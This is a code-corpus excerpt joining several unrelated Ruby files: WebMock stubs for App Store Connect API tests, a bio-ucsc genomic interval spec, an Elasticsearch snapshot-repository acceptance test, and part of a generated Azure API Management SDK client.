to_return(status: 200, body: itc_read_fixture_file("user_detail.json"),
headers: { "Content-Type" => "application/json" })
end
def itc_stub_sandbox_testers
stub_request(:get, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/users/iap").
to_return(status: 200, body: itc_read_fixture_file("sandbox_testers.json"),
headers: { "Content-Type" => "application/json" })
end
def itc_stub_create_sandbox_tester
stub_request(:post, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/users/iap/add").
with(body: JSON.parse(itc_read_fixture_file("create_sandbox_tester_payload.json"))).
to_return(status: 200, body: itc_read_fixture_file("create_sandbox_tester.json"),
headers: { "Content-Type" => "application/json" })
end
def itc_stub_delete_sandbox_tester
body = JSON.parse(itc_read_fixture_file("delete_sandbox_tester_payload.json"))
stub_request(:post, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/users/iap/delete").
with(body: JSON.parse(itc_read_fixture_file("delete_sandbox_tester_payload.json")).to_json).
to_return(status: 200, body: itc_read_fixture_file("delete_sandbox_tester.json"),
headers: { "Content-Type" => "application/json" })
end
def itc_stub_pricing_tiers
stub_request(:get, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/iaps/pricing/matrix").
to_return(status: 200, body: itc_read_fixture_file("pricing_tiers.json"),
headers: { "Content-Type" => "application/json" })
end
def itc_stub_release_to_store
stub_request(:post, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/versions/812106519/releaseToStore").
with(body: "898536088").
to_return(status: 200, body: itc_read_fixture_file("update_app_version_success.json"),
headers: { "Content-Type" => "application/json" })
end
def itc_stub_release_to_all_users
stub_request(:post, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/versions/812106519/phasedRelease/state/COMPLETE").
with(body: "898536088").
to_return(status: 200, body: itc_read_fixture_file("update_app_version_success.json"),
headers: { "Content-Type" => "application/json" })
end
def itc_stub_promocodes
stub_request(:get, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/promocodes/versions").
to_return(status: 200, body: itc_read_fixture_file("promocodes.json"),
headers: { "Content-Type" => "application/json" })
end
def itc_stub_generate_promocodes
stub_request(:post, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/promocodes/versions").
to_return(status: 200, body: itc_read_fixture_file("promocodes_generated.json"),
headers: { "Content-Type" => "application/json" })
end
def itc_stub_promocodes_history
stub_request(:get, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/promocodes/history").
to_return(status: 200, body: itc_read_fixture_file("promocodes_history.json"),
headers: { "Content-Type" => "application/json" })
end
def itc_stub_iap
# pricing goal calculator
stub_request(:get, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/iaps/1195137656/pricing/equalize/EUR/1").
to_return(status: 200, body: itc_read_fixture_file("iap_price_goal_calc.json"),
headers: { "Content-Type" => "application/json" })
stub_request(:get, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/iaps/1195137657/pricing/equalize/EUR/1").
to_return(status: 200, body: itc_read_fixture_file("iap_price_goal_calc.json"),
headers: { "Content-Type" => "application/json" })
# get shared secret
stub_request(:get, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/iaps/appSharedSecret").
to_return(status: 200, body: itc_read_fixture_file("iap_shared_secret_1.json"),
headers: { "Content-Type" => "application/json" })
# generate new shared secret
stub_request(:post, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/iaps/appSharedSecret").
to_return(status: 200, body: itc_read_fixture_file("iap_shared_secret_2.json"),
headers: { "Content-Type" => "application/json" })
# delete iap
stub_request(:delete, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/iaps/1194457865").
to_return(status: 200, body: "", headers: {})
# create consumable iap
stub_request(:post, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/iaps").
with(body: itc_read_fixture_file("iap_create.json")).
to_return(status: 200, body: itc_read_fixture_file("iap_detail.json"),
headers: { "Content-Type" => "application/json" })
# create recurring iap
stub_request(:post, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/iaps").
with(body: itc_read_fixture_file("iap_create_recurring.json")).
to_return(status: 200, body: itc_read_fixture_file("iap_detail_recurring.json"),
headers: { "Content-Type" => "application/json" })
# create recurring iap without pricing
stub_request(:post, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/iaps").
with(body: itc_read_fixture_file("iap_create_recurring_without_pricing.json")).
to_return(status: 200, body: itc_read_fixture_file("iap_detail_recurring.json"),
headers: { "Content-Type" => "application/json" })
# iap consumable template
stub_request(:get, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/iaps/consumable/template").
to_return(status: 200, body: itc_read_fixture_file("iap_consumable_template.json"),
headers: { "Content-Type" => "application/json" })
# iap recurring template
stub_request(:get, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/iaps/recurring/template").
to_return(status: 200, body: itc_read_fixture_file("iap_recurring_template.json"),
headers: { "Content-Type" => "application/json" })
# iap edit family
stub_request(:put, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/iaps/family/20373395/").
with(body: itc_read_fixture_file("iap_family_edit_versions.json")).
to_return(status: 200, body: itc_read_fixture_file("iap_family_detail.json"),
headers: { "Content-Type" => "application/json" })
# iap edit family
stub_request(:put, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/iaps/family/20373395/").
with(body: itc_read_fixture_file("iap_family_edit.json")).
to_return(status: 200, body: itc_read_fixture_file("iap_family_detail.json"),
headers: { "Content-Type" => "application/json" })
# iap edit family
stub_request(:put, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/iaps/family/20373395/").
with(body: itc_read_fixture_file("iap_family_edit_with_de.json")).
to_return(status: 200, body: itc_read_fixture_file("iap_family_detail.json"),
headers: { "Content-Type" => "application/json" })
# iap family detail
stub_request(:get, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/iaps/family/20372345").
to_return(status: 200, body: itc_read_fixture_file("iap_family_detail.json"),
headers: { "Content-Type" => "application/json" })
# create IAP family
stub_request(:post, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/iaps/family/").
with(body: JSON.parse(itc_read_fixture_file("iap_family_create.json"))).
to_return(status: 200, body: itc_read_fixture_file("iap_family_create_success.json"), headers: { "Content-Type" => "application/json" })
# load IAP Family Template
stub_request(:get, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/iaps/family/template").
to_return(status: 200, body: itc_read_fixture_file("iap_family_template.json"),
headers: { "Content-Type" => "application/json" })
# update IAP
stub_request(:put, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/iaps/1195137656").
with(body: JSON.parse(itc_read_fixture_file("iap_update.json"))).
to_return(status: 200, body: itc_read_fixture_file("iap_detail.json"),
headers: { "Content-Type" => "application/json" })
# update IAP recurring
stub_request(:put, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/iaps/1195137657").
with(body: JSON.parse(itc_read_fixture_file("iap_update_recurring.json"))).
to_return(status: 200, body: itc_read_fixture_file("iap_detail_recurring.json"),
headers: { "Content-Type" => "application/json" })
# iap details
stub_request(:get, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/iaps/1194457865").
to_return(status: 200, body: itc_read_fixture_file("iap_detail.json"),
headers: { "Content-Type" => "application/json" })
# iap details recurring
stub_request(:get, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/iaps/1195137657").
to_return(status: 200, body: itc_read_fixture_file("iap_detail_recurring.json"),
headers: { "Content-Type" => "application/json" })
# list families
stub_request(:get, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/iaps/families").
to_return(status: 200, body: itc_read_fixture_file("iap_families.json"),
headers: { "Content-Type" => "application/json" })
# list iaps
stub_request(:get, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/iaps").
to_return(status: 200, body: itc_read_fixture_file("iap_list.json"),
headers: { "Content-Type" => "application/json" })
# subscription pricing tiers
stub_request(:get, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/iaps/pricing/matrix/recurring").
to_return(status: 200, body: itc_read_fixture_file("iap_pricing_tiers.json"),
headers: { "Content-Type" => "application/json" })
# iap recurring product pricing
stub_request(:get, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/iaps/1195137657/pricing").
to_return(status: 200, body: itc_read_fixture_file("iap_pricing_recurring.json"),
headers: { "Content-Type" => "application/json" })
end
def itc_stub_reject_version_success
stub_request(:post, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/versions/812106519/reject").
to_return(status: 200, body: itc_read_fixture_file("reject_app_version_success.json"),
headers: { "Content-Type" => "application/json" })
end
def itc_stub_supported_countries
stub_request(:get, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/pricing/supportedCountries").
to_return(status: 200, body: itc_read_fixture_file(File.join('supported_countries.json')),
headers: { 'Content-Type' => 'application/json' })
end
def itc_stub_app_pricing_intervals
stub_request(:get, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/pricing/intervals").
to_return(status: 200, body: itc_read_fixture_file(File.join('app_pricing_intervals.json')),
headers: { 'Content-Type' => 'application/json' })
end
def itc_stub_app_add_territory
stub_request(:post, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/pricing/intervals").
with(body: JSON.parse(itc_read_fixture_file(File.join('availability', 'add_request.json'))).to_json).
to_return(status: 200, body: itc_read_fixture_file(File.join('availability', 'add_response.json')),
headers: { 'Content-Type' => 'application/json' })
end
def itc_stub_app_remove_territory
stub_request(:post, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/pricing/intervals").
with(body: JSON.parse(itc_read_fixture_file(File.join('availability', 'remove_request.json'))).to_json).
to_return(status: 200, body: itc_read_fixture_file(File.join('availability', 'remove_response.json')),
headers: { 'Content-Type' => 'application/json' })
end
def itc_stub_app_uninclude_future_territories
stub_request(:post, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/pricing/intervals").
with(body: JSON.parse(itc_read_fixture_file(File.join('availability', 'uninclude_all_future_territories_request.json'))).to_json).
to_return(status: 200, body: itc_read_fixture_file(File.join('availability', 'uninclude_all_future_territories_response.json')),
headers: { 'Content-Type' => 'application/json' })
end
def itc_stub_update_price_tier
stub_request(:post, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/pricing/intervals").
with(body: JSON.parse(itc_read_fixture_file(File.join('update_price_tier', 'update_price_tier_request.json'))).to_json).
to_return(status: 200, body: itc_read_fixture_file(File.join('app_pricing_intervals.json')),
headers: { 'Content-Type' => 'application/json' })
end
def itc_stub_set_preorder_cleared
stub_request(:post, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/pricing/intervals").
with(body: JSON.parse(itc_read_fixture_file(File.join('availability', 'set_preorder_cleared_request.json'))).to_json).
to_return(status: 200, body: itc_read_fixture_file(File.join('availability', 'set_preorder_cleared_response.json')),
headers: { 'Content-Type' => 'application/json' })
end
def itc_stub_set_preorder_cleared_with_date
stub_request(:post, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/pricing/intervals").
with(body: JSON.parse(itc_read_fixture_file(File.join('availability', 'set_preorder_cleared_with_date_request.json'))).to_json).
to_return(status: 200, body: itc_read_fixture_file(File.join('availability', 'set_preorder_cleared_with_date_response.json')),
headers: { 'Content-Type' => 'application/json' })
end
def itc_stub_app_pricing_intervals_vpp
stub_request(:get, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/pricing/intervals").
to_return(status: 200, body: itc_read_fixture_file(File.join('app_pricing_intervals_b2b_included.json')),
headers: { 'Content-Type' => 'application/json' })
end
def itc_stub_app_pricing_intervals_b2b_disabled
stub_request(:get, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/pricing/intervals").
to_return(status: 200, body: itc_read_fixture_file(File.join('app_pricing_intervals_b2b_flag_disabled.json')),
headers: { 'Content-Type' => 'application/json' })
end
def itc_stub_members
# resend notification
stub_request(:post, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/users/itc/[email protected]/resendInvitation").
to_return(status: 200, body: "", headers: {})
# create member default (admin, all-apps)
stub_request(:post, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/users/itc/create").
with(body: JSON.parse(itc_read_fixture_file("member_create.json"))).
to_return(status: 200, body: "", headers: {})
# create member role: developer, apps: all
stub_request(:post, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/users/itc/create").
with(body: JSON.parse(itc_read_fixture_file("member_create_developer.json"))).
to_return(status: 200, body: "", headers: {})
# create member role: appmanager, apps: 12345
stub_request(:post, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/users/itc/create").
with(body: JSON.parse(itc_read_fixture_file("member_create_appmanager_single_app.json"))).
to_return(status: 200, body: "", headers: {})
# member template
stub_request(:get, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/users/itc/create").
to_return(status: 200, body: itc_read_fixture_file(File.join('member_template.json')),
headers: { "Content-Type" => "application/json" })
# read member roles default (admin, all-apps)
stub_request(:get, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/users/itc/283226505/roles").
to_return(status: 200, body: itc_read_fixture_file(File.join('member_read_roles.json')),
headers: { "Content-Type" => "application/json" })
# update member default (admin, all-apps)
stub_request(:post, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/users/itc/283226505/roles").
with(body: JSON.parse(itc_read_fixture_file("member_update_roles.json"))).
to_return(status: 200, body: "", headers: {})
# read member roles before role: developer, apps: all
stub_request(:get, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/users/itc/10795390202/roles").
to_return(status: 200, body: itc_read_fixture_file(File.join('member_read_roles_before_developer.json')),
headers: { "Content-Type" => "application/json" })
# update member role: developer, apps: all
stub_request(:post, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/users/itc/10795390202/roles").
with(body: JSON.parse(itc_read_fixture_file("member_update_roles_developer.json"))).
to_return(status: 200, body: "", headers: {})
# read member roles before role: appmanager, apps: 12345
stub_request(:get, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/users/itc/10791511390202/roles").
to_return(status: 200, body: itc_read_fixture_file(File.join('member_read_roles_before_appmanager_single_app.json')),
headers: { "Content-Type" => "application/json" })
# update member role: appmanager, apps: 12345
stub_request(:post, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/users/itc/10791511390202/roles").
with(body: JSON.parse(itc_read_fixture_file("member_update_roles_appmanager_single_app.json"))).
to_return(status: 200, body: "", headers: {})
# Load member list
stub_request(:get, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/users/itc").
to_return(status: 200, body: itc_read_fixture_file(File.join('member_list.json')),
headers: { "Content-Type" => "application/json" })
end
def itc_stub_analytics(start_time, end_time)
stub_request(:post, "https://appstoreconnect.apple.com/analytics/api/v1/data/time-series").
with(body: { "adamId" => ["898536088"], "dimensionFilters" => [], "endTime" => end_time, "frequency" => "DAY", "group" => nil, "measures" => ["units"], "startTime" => start_time }.to_json).
to_return(status: 200, body: itc_read_fixture_file("app_analytics_units.json"),
headers: { "Content-Type" => "application/json" })
stub_request(:post, "https://appstoreconnect.apple.com/analytics/api/v1/data/time-series").
with(body: { "adamId" => ["898536088"], "dimensionFilters" => [], "endTime" => end_time, "frequency" => "DAY", "group" => nil, "measures" => ["pageViewCount"], "startTime" => start_time }.to_json).
to_return(status: 200, body: itc_read_fixture_file("app_analytics_views.json"),
headers: { "Content-Type" => "application/json" })
stub_request(:post, "https://appstoreconnect.apple.com/analytics/api/v1/data/time-series").
with(body: { "adamId" => ["898536088"], "dimensionFilters" => [], "endTime" => end_time, "frequency" => "DAY", "group" => nil, "measures" => ["iap"], "startTime" => start_time }.to_json).
to_return(status: 200, body: itc_read_fixture_file("app_analytics_in_app_purchases.json"),
headers: { "Content-Type" => "application/json" })
stub_request(:post, "https://appstoreconnect.apple.com/analytics/api/v1/data/time-series").
with(body: { "adamId" => ["898536088"], "dimensionFilters" => [], "endTime" => end_time, "frequency" => "DAY", "group" => nil, "measures" => ["sales"], "startTime" => start_time }.to_json).
to_return(status: 200, body: itc_read_fixture_file("app_analytics_sales.json"),
headers: { "Content-Type" => "application/json" })
stub_request(:post, "https://appstoreconnect.apple.com/analytics/api/v1/data/time-series").
with(body: { "adamId" => ["898536088"], "dimensionFilters" => [], "endTime" => end_time, "frequency" => "DAY", "group" => nil, "measures" => ["payingUsers"], "startTime" => start_time }.to_json).
to_return(status: 200, body: itc_read_fixture_file("app_analytics_paying_users.json"),
headers: { "Content-Type" => "application/json" })
stub_request(:post, "https://appstoreconnect.apple.com/analytics/api/v1/data/time-series").
with(body: { "adamId" => ["898536088"], "dimensionFilters" => [], "endTime" => end_time, "frequency" => "DAY", "group" => nil, "measures" => ["installs"], "startTime" => start_time }.to_json).
to_return(status: 200, body: itc_read_fixture_file("app_analytics_installs.json"),
headers: { "Content-Type" => "application/json" })
stub_request(:post, "https://appstoreconnect.apple.com/analytics/api/v1/data/time-series").
with(body: { "adamId" => ["898536088"], "dimensionFilters" => [], "endTime" => end_time, "frequency" => "DAY", "group" => nil, "measures" => ["sessions"], "startTime" => start_time }.to_json).
to_return(status: 200, body: itc_read_fixture_file("app_analytics_sessions.json"),
headers: { "Content-Type" => "application/json" })
stub_request(:post, "https://appstoreconnect.apple.com/analytics/api/v1/data/time-series").
with(body: { "adamId" => ["898536088"], "dimensionFilters" => [], "endTime" => end_time, "frequency" => "DAY", "group" => nil, "measures" => ["activeDevices"], "startTime" => start_time }.to_json).
to_return(status: 200, body: itc_read_fixture_file("app_analytics_active_devices.json"),
headers: { "Content-Type" => "application/json" })
stub_request(:post, "https://appstoreconnect.apple.com/analytics/api/v1/data/time-series").
with(body: { "adamId" => ["898536088"], "dimensionFilters" => [], "endTime" => end_time, "frequency" => "DAY", "group" => nil, "measures" => ["crashes"], "startTime" => start_time }.to_json).
to_return(status: 200, body: itc_read_fixture_file("app_analytics_crashes.json"),
headers: { "Content-Type" => "application/json" })
stub_request(:post, "https://appstoreconnect.apple.com/analytics/api/v1/data/time-series").
with(body: { "adamId" => ["898536088"], "dimensionFilters" => [], "endTime" => end_time, "frequency" => "DAY", "group" => { metric: "installs", dimension: "source", rank: "DESCENDING", limit: 3 }, "measures" => ["installs"], "startTime" => start_time }.to_json).
to_return(status: 200, body: itc_read_fixture_file("app_analytics_installs_by_source.json"),
headers: { "Content-Type" => "application/json" })
end
def itc_stub_no_live_version
stub_request(:get, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/overview").
to_return(status: 200, body: itc_read_fixture_file('app_overview_stuckinprepare.json'), headers: { 'Content-Type' => 'application/json' })
end
end
end
| 67.867868 | 270 | 0.701814 |
abbf4fc5d0cd08479a3e7840d9cde2ffcbaf9cc9 | 480 | require 'bio-ucsc'
describe "Bio::Ucsc::Hg18::DelHinds2" do
describe "#find_by_interval" do
context "given range chr1:1-20,000,000" do
it "returns an array of results with column accessors" do
Bio::Ucsc::Hg18::DBConnection.default
Bio::Ucsc::Hg18::DBConnection.connect
i = Bio::GenomicInterval.parse("chr1:1-20,000,000")
r = Bio::Ucsc::Hg18::DelHinds2.find_by_interval(i)
r.chrom.should == "chr1"
end
end
end
end
| 28.235294 | 63 | 0.647917 |
abd329f8e915f792a3fa8e7e02f198f3b18574dc | 2,433 | require 'json'
require 'helpers/acceptance/tests/manifest_shared_examples'
# Main entrypoint for snapshot tests
shared_examples 'snapshot repository acceptance tests' do
describe 'elasticsearch::snapshot_repository', :with_cleanup do
es_config = {
'http.port' => 9200,
'node.name' => 'elasticsearchSnapshot01',
'path.repo' => '/var/lib/elasticsearch'
}
# Override the manifest in order to populate 'path.repo'
let(:manifest) do
package = if not v[:is_snapshot]
<<-MANIFEST
# Hard version set here due to plugin incompatibilities.
version => '#{v[:elasticsearch_full_version]}',
MANIFEST
else
<<-MANIFEST
manage_repo => false,
package_url => '#{v[:snapshot_package]}',
MANIFEST
end
<<-MANIFEST
api_timeout => 60,
config => {
'cluster.name' => '#{v[:cluster_name]}',
'http.bind_host' => '0.0.0.0',
#{es_config.map { |k, v| " '#{k}' => '#{v}'," }.join("\n")}
},
jvm_options => [
'-Xms128m',
'-Xmx128m',
],
oss => #{v[:oss]},
#{package}
MANIFEST
end
let(:manifest_class_parameters) { 'restart_on_change => true' }
let(:extra_manifest) do
<<-MANIFEST
elasticsearch::snapshot_repository { 'backup':
ensure => 'present',
api_timeout => 60,
location => '/var/lib/elasticsearch/backup',
max_restore_rate => '20mb',
max_snapshot_rate => '80mb',
}
MANIFEST
end
include_examples('manifest application', es_config)
es_port = es_config['http.port']
describe port(es_port) do
it 'open', :with_retries do
should be_listening
end
end
describe server :container do
describe http(
"http://localhost:#{es_port}/_snapshot/backup"
) do
it 'returns the snapshot repository', :with_retries do
expect(JSON.parse(response.body)['backup'])
.to include('settings' => a_hash_including(
'location' => '/var/lib/elasticsearch/backup',
'max_restore_rate' => '20mb',
'max_snapshot_rate' => '80mb'
))
end
end
end
end
end
| 29.670732 | 76 | 0.530621 |
187786e04bc30f3de65df11df219acf52e6eff4b | 39,299 | # Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::ApiManagement::Mgmt::V2016_10_10
#
# ApiManagement Client
#
class Groups
include MsRestAzure
#
# Creates and initializes a new instance of the Groups class.
# @param client service class for accessing basic functionality.
#
def initialize(client)
@client = client
end
# @return [ApiManagementClient] reference to the ApiManagementClient
attr_reader :client
#
# Lists a collection of groups defined within a service instance.
#
# @param resource_group_name [String] The name of the resource group.
# @param service_name [String] The name of the API Management service.
# @param filter [String] | Field | Supported operators | Supported
# functions |
# |-------------|------------------------|---------------------------------------------|
# | id | ge, le, eq, ne, gt, lt | substringof, contains, startswith,
# endswith |
# | name | ge, le, eq, ne, gt, lt | substringof, contains, startswith,
# endswith |
# | description | ge, le, eq, ne, gt, lt | substringof, contains, startswith,
# endswith |
# | type | eq, ne | N/A
# |
# @param top [Integer] Number of records to return.
# @param skip [Integer] Number of records to skip.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [Array<GroupContract>] operation results.
#
def list_by_service(resource_group_name, service_name, filter:nil, top:nil, skip:nil, custom_headers:nil)
first_page = list_by_service_as_lazy(resource_group_name, service_name, filter:filter, top:top, skip:skip, custom_headers:custom_headers)
first_page.get_all_items
end
#
# Lists a collection of groups defined within a service instance.
#
# @param resource_group_name [String] The name of the resource group.
# @param service_name [String] The name of the API Management service.
# @param filter [String] | Field | Supported operators | Supported
# functions |
# |-------------|------------------------|---------------------------------------------|
# | id | ge, le, eq, ne, gt, lt | substringof, contains, startswith,
# endswith |
# | name | ge, le, eq, ne, gt, lt | substringof, contains, startswith,
# endswith |
# | description | ge, le, eq, ne, gt, lt | substringof, contains, startswith,
# endswith |
# | type | eq, ne | N/A
# |
# @param top [Integer] Number of records to return.
# @param skip [Integer] Number of records to skip.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [MsRestAzure::AzureOperationResponse] HTTP response information.
#
def list_by_service_with_http_info(resource_group_name, service_name, filter:nil, top:nil, skip:nil, custom_headers:nil)
list_by_service_async(resource_group_name, service_name, filter:filter, top:top, skip:skip, custom_headers:custom_headers).value!
end
#
# Lists a collection of groups defined within a service instance.
#
# @param resource_group_name [String] The name of the resource group.
# @param service_name [String] The name of the API Management service.
# @param filter [String] | Field | Supported operators | Supported
# functions |
# |-------------|------------------------|---------------------------------------------|
# | id | ge, le, eq, ne, gt, lt | substringof, contains, startswith,
# endswith |
# | name | ge, le, eq, ne, gt, lt | substringof, contains, startswith,
# endswith |
# | description | ge, le, eq, ne, gt, lt | substringof, contains, startswith,
# endswith |
# | type | eq, ne | N/A
# |
# @param top [Integer] Number of records to return.
# @param skip [Integer] Number of records to skip.
# @param [Hash{String => String}] A hash of custom headers that will be added
# to the HTTP request.
#
# @return [Concurrent::Promise] Promise object which holds the HTTP response.
#
def list_by_service_async(resource_group_name, service_name, filter:nil, top:nil, skip:nil, custom_headers:nil)
fail ArgumentError, 'resource_group_name is nil' if resource_group_name.nil?
fail ArgumentError, 'service_name is nil' if service_name.nil?
fail ArgumentError, "'service_name' should satisfy the constraint - 'MaxLength': '50'" if !service_name.nil? && service_name.length > 50
fail ArgumentError, "'service_name' should satisfy the constraint - 'MinLength': '1'" if !service_name.nil? && service_name.length < 1
fail ArgumentError, "'service_name' should satisfy the constraint - 'Pattern': '^[a-zA-Z](?:[a-zA-Z0-9-]*[a-zA-Z0-9])?$'" if !service_name.nil? && service_name.match(Regexp.new('^^[a-zA-Z](?:[a-zA-Z0-9-]*[a-zA-Z0-9])?$$')).nil?
fail ArgumentError, "'top' should satisfy the constraint - 'InclusiveMinimum': '1'" if !top.nil? && top < 1
fail ArgumentError, "'skip' should satisfy the constraint - 'InclusiveMinimum': '0'" if !skip.nil? && skip < 0
fail ArgumentError, '@client.api_version is nil' if @client.api_version.nil?
fail ArgumentError, '@client.subscription_id is nil' if @client.subscription_id.nil?
request_headers = {}
request_headers['Content-Type'] = 'application/json; charset=utf-8'
# Set Headers
request_headers['x-ms-client-request-id'] = SecureRandom.uuid
request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil?
path_template = 'subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ApiManagement/service/{serviceName}/groups'
request_url = @base_url || @client.base_url
options = {
middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]],
path_params: {'resourceGroupName' => resource_group_name,'serviceName' => service_name,'subscriptionId' => @client.subscription_id},
query_params: {'$filter' => filter,'$top' => top,'$skip' => skip,'api-version' => @client.api_version},
headers: request_headers.merge(custom_headers || {}),
base_url: request_url
}
promise = @client.make_request_async(:get, path_template, options)
promise = promise.then do |result|
http_response = result.response
status_code = http_response.status
response_content = http_response.body
unless status_code == 200
error_model = JSON.load(response_content)
fail MsRestAzure::AzureOperationError.new(result.request, http_response, error_model)
end
result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil?
result.correlation_request_id = http_response['x-ms-correlation-request-id'] unless http_response['x-ms-correlation-request-id'].nil?
result.client_request_id = http_response['x-ms-client-request-id'] unless http_response['x-ms-client-request-id'].nil?
# Deserialize Response
if status_code == 200
begin
parsed_response = response_content.to_s.empty? ? nil : JSON.load(response_content)
result_mapper = Azure::ApiManagement::Mgmt::V2016_10_10::Models::GroupCollection.mapper()
result.body = @client.deserialize(result_mapper, parsed_response)
rescue Exception => e
fail MsRest::DeserializationError.new('Error occurred in deserializing the response', e.message, e.backtrace, result)
end
end
result
end
promise.execute
end
#
# Gets the details of the group specified by its identifier.
#
# @param resource_group_name [String] The name of the resource group.
# @param service_name [String] The name of the API Management service.
# @param group_id [String] Group identifier. Must be unique in the current API
# Management service instance.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [GroupContract] operation results.
#
def get(resource_group_name, service_name, group_id, custom_headers:nil)
response = get_async(resource_group_name, service_name, group_id, custom_headers:custom_headers).value!
response.body unless response.nil?
end
#
# Gets the details of the group specified by its identifier.
#
# @param resource_group_name [String] The name of the resource group.
# @param service_name [String] The name of the API Management service.
# @param group_id [String] Group identifier. Must be unique in the current API
# Management service instance.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [MsRestAzure::AzureOperationResponse] HTTP response information.
#
def get_with_http_info(resource_group_name, service_name, group_id, custom_headers:nil)
get_async(resource_group_name, service_name, group_id, custom_headers:custom_headers).value!
end
#
# Gets the details of the group specified by its identifier.
#
# @param resource_group_name [String] The name of the resource group.
# @param service_name [String] The name of the API Management service.
# @param group_id [String] Group identifier. Must be unique in the current API
# Management service instance.
# @param [Hash{String => String}] A hash of custom headers that will be added
# to the HTTP request.
#
# @return [Concurrent::Promise] Promise object which holds the HTTP response.
#
def get_async(resource_group_name, service_name, group_id, custom_headers:nil)
fail ArgumentError, 'resource_group_name is nil' if resource_group_name.nil?
fail ArgumentError, 'service_name is nil' if service_name.nil?
fail ArgumentError, "'service_name' should satisfy the constraint - 'MaxLength': '50'" if !service_name.nil? && service_name.length > 50
fail ArgumentError, "'service_name' should satisfy the constraint - 'MinLength': '1'" if !service_name.nil? && service_name.length < 1
fail ArgumentError, "'service_name' should satisfy the constraint - 'Pattern': '^[a-zA-Z](?:[a-zA-Z0-9-]*[a-zA-Z0-9])?$'" if !service_name.nil? && service_name.match(Regexp.new('^^[a-zA-Z](?:[a-zA-Z0-9-]*[a-zA-Z0-9])?$$')).nil?
